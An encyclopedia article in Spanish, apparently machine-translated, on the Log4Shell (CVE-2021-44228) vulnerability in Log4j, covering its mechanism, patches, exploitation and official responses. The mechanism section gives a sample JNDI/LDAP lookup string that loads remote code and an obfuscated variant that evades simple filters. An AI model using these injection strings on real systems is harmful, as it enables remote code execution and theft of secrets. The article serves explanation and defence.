Log4Shell

La versión actual de la página aún no ha sido revisada por colaboradores experimentados y puede diferir significativamente de la versión revisada el 12 de mayo de 2022; las comprobaciones requieren 3 ediciones .

Log4Shell ( CVE-2021-44228 ) es una vulnerabilidad de día cero en Log4j , un popular marco de registro de Java, que implica la ejecución de código arbitrario. [1] [2] La vulnerabilidad -su existencia no se ha visto desde 2013- fue revelada en privado por Apache Software Foundation , de la cual Log4j es un proyecto, por Chen Zhaojun del equipo de seguridad de Alibaba Cloud el 24 de noviembre de 2021 y públicamente divulgado el 9 de diciembre de 2021. [3] [4] [5] [6] Apache otorgó a Log4Shell una puntuación de gravedad CVSS de 10, la calificación más alta disponible. [7] Se estima que el exploit afecta a cientos de millones de dispositivos y es muy fácil de usar. [8] [9]

La vulnerabilidad explota el hecho de que Log4j permite solicitudes a servidores LDAP y JNDI arbitrarios en lugar de validar respuestas, [1] [10] [11] lo que permite a los atacantes ejecutar código Java arbitrario en un servidor u otra máquina, o transmitir información confidencial. [5] Apache Security Group ha publicado una lista de los proyectos de software afectados. [12] Los servicios comerciales afectados incluyen Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ y muchos más. [10] [16] [17] Según Wiz y EY , la vulnerabilidad afectó al 93 % de los entornos empresariales en la nube. [Dieciocho]

Los expertos describieron a Log4Shell como la mayor vulnerabilidad de la historia; [19] LunaSec lo describió como "una falla de diseño de proporciones catastróficas", [5] Tenable dijo que el exploit era "la vulnerabilidad más grande y crítica de la historia", [20] Ars Technica lo llamó "posiblemente la vulnerabilidad más grave de la historia". . [21] y The Washington Post dijeron que las descripciones de los expertos en seguridad "rayan en el apocalipsis". [19]

Antecedentes

Log4j es una biblioteca de registro de código abierto que permite a los desarrolladores de software registrar datos en sus aplicaciones. Estos datos pueden incluir la entrada del usuario. [22] Es omnipresente en aplicaciones Java, especialmente en software empresarial. [5] Originalmente escrito en 2001 por Cheki Gulcu, ahora es parte de Apache Logging Services, un proyecto de Apache Software Foundation . [23] El ex miembro de la Comisión de Seguridad Cibernética del presidente Barack Obama , Tom Kellermann, describió a Apache como "uno de los pilares gigantes del puente que facilita el tejido conectivo entre los mundos de las aplicaciones y el entorno informático". [24]

Comportamiento

La Interfaz de nombres y directorios de Java (JNDI) le permite buscar objetos de Java en tiempo de ejecución, dada la ruta a sus datos. JNDI puede usar varias interfaces de directorio, cada una de las cuales proporciona un esquema de búsqueda de archivos diferente. Entre estas interfaces se encuentra el Protocolo ligero de acceso a directorios (LDAP), un protocolo no Java [25] que recupera datos de objetos en forma de URL desde un servidor apropiado, local o cualquier otro en Internet. [26]

En la configuración predeterminada, cuando se registra una cadena, Log4j 2 realiza la sustitución de cadenas en expresiones de la forma ${prefix:name}. [26] Por ejemplo, Text: ${java:version}puede convertir a Text: Java version 1.7.0_67. [27] Entre las expresiones reconocidas están ${jndi:<lookup>} ; al especificar una búsqueda a través de LDAP, se puede consultar y cargar una URL arbitraria como datos de objeto Java. ${jndi:ldap://example.com/file}descargará datos de esta URL cuando esté conectado a Internet. Al ingresar una cadena que se registra, un atacante puede descargar y ejecutar un código malicioso alojado en una URL pública. [26] Incluso si la ejecución de datos está deshabilitada, un atacante puede obtener datos, como variables de entorno secretas, colocándolos en una URL donde serán reemplazados y enviados al servidor del atacante. [28] [29] Además de LDAP, otros protocolos de búsqueda JNDI potencialmente útiles incluyen su variante segura LDAPS, la invocación de método remoto Java (RMI), el sistema de nombres de dominio (DNS) y el protocolo Internet Inter-ORB (IIOP). [30] [31]

Dado que las solicitudes HTTP a menudo se registran, un vector de ataque común es colocar una cadena maliciosa en la URL de la solicitud HTTP o en un encabezado HTTP registrado con frecuencia , como User-Agent. Las primeras protecciones incluían el bloqueo de cualquier solicitud que contuviera contenido potencialmente malicioso, como ${jndi. [32] Se puede omitir una búsqueda ingenua ofuscando la consulta: por ejemplo, ${${lower:j}ndise convertirá en una búsqueda JNDI después de realizar una operación de cadena en la letra j. [33] Incluso si una entrada, como un nombre, no se registra inmediatamente, se puede registrar más tarde durante el procesamiento interno y ejecutar su contenido. [26]

Correcciones

Las correcciones para esta vulnerabilidad se publicaron el 6 de diciembre de 2021, tres días antes de que se publicara la vulnerabilidad, en Log4j versión 2.15.0-rc1. [34] [35] [36] La solución incluía la limitación de los servidores y protocolos que se pueden usar para las búsquedas. Los investigadores encontraron un error relacionado CVE-2021-45046 que permite la ejecución de código local o remoto en ciertas configuraciones no predeterminadas, y se corrigió en la versión 2.16.0, que deshabilitó todas las funciones que utilizan JNDI y la compatibilidad con la búsqueda de mensajes. [37] [38] Para versiones anteriores, la clase org.apache.logging.log4j.core.lookup. JndiLookupdebe eliminarse del classpath para mitigar ambas vulnerabilidades. [7] [37] La ​​solución recomendada anteriormente para versiones anteriores era establecer la propiedad del sistema log4j2.formatMsgNoLookups trueen , pero este cambio no impide que se use CVE-2021-45046. [37]

Las versiones más recientes de Java Runtime Environment (JRE) también mitigan esta vulnerabilidad al bloquear la carga remota de código de forma predeterminada, aunque todavía existen otros vectores de ataque en algunas aplicaciones. [1] [28] [39] [40] Se han publicado varios métodos y herramientas para ayudar a detectar el uso de versiones vulnerables de log4j en paquetes integrados de Java. [41]

Uso

El exploit permite a los piratas informáticos tomar el control de dispositivos vulnerables utilizando Java . [8] Algunos piratas utilizan la vulnerabilidad para aprovechar los dispositivos de las víctimas; incluida la minería de criptomonedas , la creación de botnets , el envío de spam, la creación de puertas traseras y otras actividades ilegales, como los ataques de ransomware. [8] [19] [42] En los días posteriores al lanzamiento de la vulnerabilidad , Check Point rastreó millones de ataques iniciados por piratas informáticos, y algunos investigadores observaron más de cien ataques por minuto, lo que eventualmente resultó en más del 40% de los ataques. redes comerciales sujetas a ataques internacionales. [8] [24]

Según el CEO de Cloudflare, Matthew Prince, la evidencia del uso o prueba de exploits surgió el 1 de diciembre, nueve días antes de que se divulgara públicamente. [43] Según la firma de seguridad cibernética GreyNoise, varias direcciones IP  han sido rastreadas por sitios web para buscar servidores que tengan la vulnerabilidad. [44] Varias redes de bots comenzaron a buscar la vulnerabilidad, incluida la red de bots Muhstik el 10 de diciembre, así como Mirai , Tsunami y XMRig. [8] [43] [45] Conti fue visto explotando la vulnerabilidad el 17 de diciembre. [19]

Algunos grupos patrocinados por el estado en China e Irán también usaron el exploit, según Check Point, aunque no se sabe si Israel, Rusia o los EE. UU. lo usaron antes de que se revelara la vulnerabilidad. [19] [46] Check Point declaró que el 15 de diciembre de 2021, piratas informáticos respaldados por Irán intentaron infiltrarse en empresas y redes gubernamentales israelíes. [19]

Respuesta e influencia

Gobierno

En Estados Unidos , la directora de la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA), Jen Easterly, describió el exploit como "uno de los más graves, si no el más grave, que he visto en toda mi carrera", y explicó que cientos de millones de dispositivos se vieron afectados. y recomendó que los proveedores paguen priorizando las actualizaciones de software. [8] [47] [48] Las agencias civiles contratadas por el gobierno de EE. UU. tenían hasta el 24 de diciembre de 2021 para corregir las vulnerabilidades, aunque para entonces eso habría permitido el acceso a cientos de miles de objetivos. [19]

El Centro Canadiense para la Seguridad Cibernética (CCCS) hizo un llamado a las organizaciones para que tomen medidas inmediatas. [49] La Agencia Tributaria Canadiense deshabilitó temporalmente sus servicios en línea después de enterarse del exploit, mientras que el gobierno de Quebec cerró casi 4000 de sus sitios web como una "medida preventiva". [cincuenta]

La Oficina Federal de Seguridad de Alemania ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) ha identificado el exploit en el nivel más alto de amenaza, calificándolo de "situación peligrosa extremadamente crítica" (traducido). También dijo que varios ataques ya han tenido éxito y que el alcance de la vulnerabilidad aún es difícil de evaluar. [51] [52] El Centro Nacional de Seguridad Cibernética de los Países Bajos (NCSC) ha iniciado una lista permanente de aplicaciones vulnerables. [53] [54]

El Ministerio de Industria y Tecnología de la Información de China suspendió a Alibaba Cloud como socio de análisis de amenazas de ciberseguridad durante seis meses después de no informar primero la vulnerabilidad al gobierno. [55]

Negocios

Un estudio realizado por Wiz y EY [18] descubrió que el 93 % del entorno empresarial en la nube era vulnerable a Log4Shell. El 7% de las cargas de trabajo vulnerables están disponibles en línea y están sujetas a intentos de explotación extensivos. Según el estudio, diez días después de la publicación de la vulnerabilidad (20 de diciembre de 2021), solo el 45% de las cargas de trabajo afectadas fueron parcheadas en promedio en entornos de nube. Los datos en la nube de Amazon, Google y Microsoft se han visto afectados por Log4Shell. [19]

La empresa de recursos humanos y recursos humanos UKG, una de las empresas más grandes de la industria, se ha visto afectada por un ataque de ransomware que afecta a grandes empresas. [21] [56] UKG declaró que no tenía evidencia de que Log4Shell se usara en el incidente, aunque el analista Allan Liska de la compañía de seguridad cibernética Recorded Future dijo que podría haber un vínculo. [57]

A medida que las empresas más grandes comenzaron a lanzar parches para el exploit, el riesgo para las pequeñas empresas aumentó a medida que los piratas informáticos se enfocaban en objetivos más vulnerables. [42]

Privacidad

Los dispositivos personales, como los televisores inteligentes y las cámaras de seguridad conectadas a Internet, eran vulnerables al exploit. [19]

Análisis

A partir del 14 de diciembre de 2021, casi la mitad de todas las redes corporativas del mundo se investigaron activamente y se crearon más de 60 variantes de explotación en un día. [58] Check Point Software Technologies, en un análisis detallado, describió la situación como "una verdadera pandemia cibernética" y describió el daño potencial como "incalculable". [59] Varias de las recomendaciones originales sobrestimaron la cantidad de paquetes vulnerables, lo que generó falsos positivos. En particular, el paquete "log4j api" se marcó como vulnerable, mientras que, de hecho, una investigación más profunda mostró que solo el paquete principal "log4j-core" era vulnerable.

Esto ha sido confirmado tanto en la rama de lanzamiento original [60] como por investigadores de seguridad externos.

La revista de tecnología Wired escribió que a pesar del "bombo" anterior en torno a numerosas vulnerabilidades, "el bombo que rodea a la vulnerabilidad Log4j... está justificado por una serie de razones". [46] La revista explica que la ubicuidad de log4j, cuya vulnerabilidad es difícil de detectar por posibles objetivos, y la facilidad con la que se puede transferir el código a la máquina de una víctima crearon "una combinación de seriedad, accesibilidad y prevalencia que sorprendió a los profesionales de la seguridad. ." [46] Wired también presentó esquemáticamente la secuencia del uso de Log4Shell por parte de los piratas informáticos: los grupos de minería de criptomonedas serán los primeros en explotar la vulnerabilidad, luego los comerciantes de datos venderán la "cabeza de puente" a los ciberdelincuentes, quienes finalmente se dedicarán a la extorsión, el espionaje y la destrucción de datos. . [46]

Amit Göran, director ejecutivo de Tenable y director fundador del Grupo de Preparación para Emergencias Informáticas de EE . UU. , afirmó que "[Log4Shell] es, con mucho, la vulnerabilidad más grande y crítica de la historia", y señaló que los ataques sofisticados comenzaron poco después del error, afirmando: "También Ya veo que se usa para ataques de ransomware, lo que, nuevamente, debería ser una importante llamada de atención... También hemos visto informes de atacantes que usan Log4Shell para destruir sistemas sin siquiera intentar obtener un rescate, un comportamiento bastante inusual". . [46] El investigador sénior de amenazas de Sophos, Sean Gallagher, dijo: "Para ser honesto, la mayor amenaza aquí es que las personas ya obtuvieron acceso y solo lo están usando, e incluso si soluciona el problema, alguien ya está en línea... existido durante tanto tiempo como Internet". [veinte]

Notas

  1. 123 Wortley._ _ _ Log4Shell: exploit de día cero RCE encontrado en log4j 2, un popular  paquete de registro de Java . LunaSec (9 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  2. CVE-2021-44228 . Vulnerabilidades y exposiciones comunes . Consultado el 12 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  3. Povolni. La vulnerabilidad de Log4Shell es el carbón en nuestras existencias para  2021 . McAfee (10 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  4. El peor Apache Log4j RCE Zero Day lanzado en Internet . Ciber Kendra (9 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  5. 1 2 3 4 Newman . 'Internet está en llamas'  (ing.) , Wired  (10 de diciembre de 2021). Archivado desde el original el 24 de diciembre de 2021. Consultado el 12 de diciembre de 2021.
  6. Murphy . Los piratas informáticos lanzan más de 1,2 millones de ataques a través de la falla Log4J , Financial Times  (14 de diciembre de 2021). Archivado desde el original el 17 de diciembre de 2021. Consultado el 17 de diciembre de 2021.
  7. 1 2 Vulnerabilidades de seguridad de Apache Log4j . Log4j . Fundación de Software Apache. Consultado el 12 de diciembre de 2021. Archivado desde el original el 26 de diciembre de 2021.
  8. 1 2 3 4 5 6 Murphy, Hannah . Los piratas informáticos lanzan más de 1,2 millones de ataques a través de la falla Log4J , Financial Times  (14 de diciembre de 2021). Archivado desde el original el 21 de diciembre de 2021. Consultado el 25 de diciembre de 2021.
  9. Cazador. La brecha de seguridad "más grave" de la historia se está desarrollando en este momento. Esto es lo que necesita saber. . The Washington Post (20 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 27 de diciembre de 2021.
  10. 12 Mot . Innumerables servidores son vulnerables a Apache Log4j Zero-Day Exploit . Revista PC (10 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.  
  11. Goodin. ¿ El día cero en la omnipresente herramienta Log4j representa una grave amenaza para   Internet ? . Ars Technica (10 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 23 de diciembre de 2021.
  12. Proyectos de Apache afectados por log4j CVE-2021-44228 (14 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 17 de diciembre de 2021.
  13. Actualización para el problema Apache Log4j2 (CVE-2021-44228) . Amazon Web Services (12 de diciembre de 2021). Consultado el 13 de diciembre de 2021. Archivado desde el original el 28 de diciembre de 2021.
  14. Lovejoy. Apple parchea la vulnerabilidad Log4Shell iCloud, descrita como la más crítica en una década . 9to5mac (14 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 23 de diciembre de 2021.
  15. Vulnerabilidad de seguridad en Minecraft: Java Edition . minecraft _ Estudios Mojang . Consultado el 13 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  16. Goodin. Los jugadores más importantes de Internet se ven afectados por el crítico Log4Shell 0-day . ArsTechnica (10 de diciembre de 2021). Consultado el 13 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  17. Rundle. ¿Qué es la vulnerabilidad Log4j? (15 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  18. ↑ 1 2 Empresas a medio camino de parchear Log4Shell | blog mago . www.wiz.io._ _ Consultado el 20 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  19. 1 2 3 4 5 6 7 8 9 Hunter, Tatum; de Vynck, Gerrit La brecha de seguridad 'más grave' de la historia se está desarrollando en este momento. Esto es lo que necesita saber. . The Washington Post (20 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 27 de diciembre de 2021.
  20. ↑ 12 Barret._ _ _ La próxima ola de ataques Log4J será brutal  (inglés) , Wired . Archivado desde el original el 17 de diciembre de 2021. Consultado el 17 de diciembre de 2021.
  21. ↑ 12 Goodin . Mientras Log4Shell causa estragos, el servicio de nómina informa de un   ataque de ransomware . . Ars Technica (13 de diciembre de 2021). Consultado el 17 de diciembre de 2021. Archivado desde el original el 17 de diciembre de 2021.
  22. Yan. Otra vulnerabilidad de Apache Log4j se explota activamente en estado salvaje (CVE-2021-44228) . Unidad 42 . Palo Alto Networks (10 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  23. Apache Log4j 2 . Fundación de Software Apache. Consultado el 12 de diciembre de 2021. Archivado desde el original el 14 de diciembre de 2021.
  24. ↑ 1 2 Byrnes. La vulnerabilidad de Hillicon Valley-Apache hace sonar las  alarmas . El Cerro (14 de diciembre de 2021). Consultado el 17 de diciembre de 2021. Archivado desde el original el 17 de diciembre de 2021.
  25. "" . RFCrfc4511.
  26. 1 2 3 4 Graham-Cumming. Dentro de la vulnerabilidad Log4j2 (CVE-2021-44228  ) . El blog de Cloudflare (10 de diciembre de 2021). Consultado el 13 de diciembre de 2021. Archivado desde el original el 22 de diciembre de 2021.
  27. Búsquedas . Log4j . Fundación de Software Apache. Consultado el 13 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  28. 12 Patito . Log4Shell explicó: cómo funciona, por qué necesita saberlo y cómo solucionarlo . Seguridad desnuda . Sophos (12 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 26 de diciembre de 2021.
  29. Miessler. La situación de log4j (Log4Shell) . Aprendizaje no supervisado (13 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 13 de diciembre de 2021.
  30. Duraishamy. Parche ahora Vulnerabilidad de Apache Log4j llamada Log4Shell explotada activamente . Trend Micro (13 de diciembre de 2021). Consultado el 14 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  31. Narang. CVE-2021-44228: Prueba de concepto para la vulnerabilidad crítica de ejecución remota de código Apache Log4j disponible (Log4Shell) . Blog de Tenable (10 de diciembre de 2021). Consultado el 14 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  32. Gabor. CVE-2021-44228: Log4j RCE Mitigación de 0 días . El blog de Cloudflare (10 de diciembre de 2021). Consultado el 13 de diciembre de 2021. Archivado desde el original el 23 de diciembre de 2021.
  33. Hahad. La vulnerabilidad de Apache Log4j CVE-2021-44228 genera preocupaciones generalizadas (12 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 13 de diciembre de 2021.
  34. ↑ Restrinja el acceso a LDAP a través de JNDI por rgoers #608  . Log4j (5 de diciembre de 2021). Consultado el 12 de diciembre de 2021. Archivado desde el original el 30 de diciembre de 2021.
  35. Berger. ¿Qué es Log4Shell? Explicación de la vulnerabilidad de Log4j (y qué hacer al respecto) . Noticias de Dynatrace (17 de diciembre de 2021). Apache emitió un parche para CVE-2021-44228, versión 2.15, el 6 de diciembre. Sin embargo, este parche dejó parte de la vulnerabilidad sin reparar, lo que resultó en CVE-2021-45046 y un segundo parche, versión 2.16, lanzado el 13 de diciembre. Apache lanzó un tercer parche, versión 2.17, el 17 de diciembre para corregir otra vulnerabilidad relacionada, CVE-2021-45105". Consultado el 25 de diciembre de 2021. Archivado desde el original el 21 de diciembre de 2021.
  36. Rudis. Explotación generalizada de la ejecución de código remoto crítico en Apache Log4j | Blog  Rapid7 . Rapid7 (10 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 21 de diciembre de 2021.
  37. 123 CVE - 2021-45046 . Vulnerabilidades y exposiciones comunes (15 de diciembre de 2021). Consultado el 15 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  38. Greig. Segunda vulnerabilidad de Log4j descubierta, parche ya  lanzado . ZDNet (14 de diciembre de 2021). Consultado el 17 de diciembre de 2021. Archivado desde el original el 27 de diciembre de 2021.
  39. Java(TM) SE Development Kit 8, Actualización 121 (JDK 8u121)  Notas de la versión . Oráculo (17 de enero de 2017). Consultado el 13 de diciembre de 2021. Archivado desde el original el 19 de diciembre de 2021.
  40. Explotación de inyecciones JNDI en Java . Veracode (3 de enero de 2019). Consultado el 15 de diciembre de 2021. Archivado desde el original el 15 de diciembre de 2021.
  41. Guía: Cómo detectar y mitigar la vulnerabilidad Log4Shell (CVE-2021-44228  ) . www.lunasec.io (13 de diciembre de 2021). Consultado el 13 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  42. ↑ 12 Woodyard .  'Vulnerabilidad crítica ' : ¿Puede ser más difícil para las empresas más pequeñas evitar que los piratas informáticos exploten la falla de Log4j  ? . EE.UU. hoy . Fecha de acceso: 17 de diciembre de 2021.
  43. 12 Duckett . La actividad de Log4j RCE comenzó el 1 de diciembre cuando las botnets comenzaron a usar la  vulnerabilidad . ZDNet . Consultado el 13 de diciembre de 2021. Archivado desde el original el 22 de diciembre de 2021.
  44. Actividad de explotación para la vulnerabilidad de Apache Log4j - CVE-2021-44228 . Greynoise Research (10 de diciembre de 2021). Consultado el 14 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  45. Zugec. Aviso técnico: Vulnerabilidad crítica de día cero en Log4j2 explotada en la naturaleza . percepciones de negocios . Bitdefender (13 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 15 de diciembre de 2021.
  46. 1 2 3 4 5 Barret, Brian . La próxima ola de ataques Log4J será brutal  (inglés) , Wired . Archivado desde el original el 27 de diciembre de 2021. Consultado el 25 de diciembre de 2021.
  47. Declaración del director de CISA, Easterly, sobre la vulnerabilidad "Log4j" . CISA (11 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 27 de diciembre de 2021.
  48. Woodyard, Chris 'Vulnerabilidad crítica  ' : ¿Puede ser más difícil para las empresas más pequeñas evitar que los piratas informáticos exploten la falla de Log4j  ? . EE.UU. hoy . Fecha de acceso: 17 de diciembre de 2021.
  49. Declaración del Ministro de Defensa Nacional sobre la vulnerabilidad de Apache y llamado a las organizaciones canadienses para que tomen medidas  urgentes . Gobierno de Canadá (12 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  50. Cabrera . Ante las amenazas de ciberseguridad, Quebec cierra los sitios web del gobierno para su evaluación , CBC News  (12 de diciembre de 2021). Archivado desde el original el 20 de diciembre de 2021. Consultado el 12 de diciembre de 2021.
  51. Sauerwein. BSI warnt vor Sicherheitslücke  (alemán) . Tagesschau (12 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 5 de enero de 2022.
  52. (11 de diciembre de 2021). Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage (en de). Comunicado de prensa . Archivado desde el original el 13 de diciembre de 2021. Consultado el 25 de diciembre de 2021 .
  53. J. Vaughan-Nichols. Log4Shell: Estamos en tantos problemas . The New Stack (14 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 23 de diciembre de 2021.
  54. NCSC-NL/log4shell . Centro Nacional de Seguridad Cibernética (Países Bajos). Consultado el 14 de diciembre de 2021. Archivado desde el original el 29 de diciembre de 2021.
  55. Error de Apache Log4j: el ministerio de industria de China obtiene el apoyo de Alibaba Cloud por no informar primero sobre la falla al gobierno . Consultado el 25 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.
  56. Bray. Error de software emergente 'Log4j' genera preocupación en todo el mundo por ataques cibernéticos: ¿The Boston   Globe ? . The Boston Globe (15 de diciembre de 2021). Consultado el 17 de diciembre de 2021. Archivado desde el original el 17 de diciembre de 2021.
  57. Bray, Hiawatha El error de software emergente 'Log4j' genera preocupación en todo el mundo por los ataques cibernéticos: ¿The Boston   Globe ? . The Boston Globe (15 de diciembre de 2021). Consultado el 17 de diciembre de 2021. Archivado desde el original el 17 de diciembre de 2021.
  58. Casi la mitad de las redes sondearon las debilidades de Log4Shell . ComputerWeekly (14 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 20 de diciembre de 2021.
  59. Los números detrás de una pandemia cibernética: análisis detallado . Software Check Point (13 de diciembre de 2021). Consultado el 25 de diciembre de 2021. Archivado desde el original el 24 de diciembre de 2021.
  60. LOG4J2-3201: Limite los protocolos que JNDI puede usar y restrinja LDAP. . Rastreador de problemas JIRA de Apache . Consultado el 14 de diciembre de 2021. Archivado desde el original el 25 de diciembre de 2021.